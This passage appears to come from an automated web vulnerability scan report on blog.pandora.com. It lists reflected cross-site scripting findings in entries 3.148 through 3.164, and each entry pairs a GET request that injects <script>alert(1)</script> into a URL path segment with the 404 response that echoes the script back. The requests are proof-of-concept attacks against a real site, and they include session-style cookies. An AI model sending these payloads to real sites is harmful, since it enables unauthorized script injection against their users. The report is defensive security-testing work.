Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p>
...[SNIP]...

3.148. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p>
...[SNIP]...

3.149. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p>
...[SNIP]...

3.150. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p>
...[SNIP]...

3.151. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p>
...[SNIP]...

3.152. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p>
...[SNIP]...

3.153. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p>
...[SNIP]...

3.154. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p>
...[SNIP]...

3.155. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p>
...[SNIP]...

3.156. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p>
...[SNIP]...

3.157. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p>
...[SNIP]...

3.158. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p>
...[SNIP]...

3.159. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p>
...[SNIP]...

3.160. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p>
...[SNIP]...

3.161. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p>
...[SNIP]...

3.162. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p>
...[SNIP]...

3.163. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p>
...[SNIP]...

3.164. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
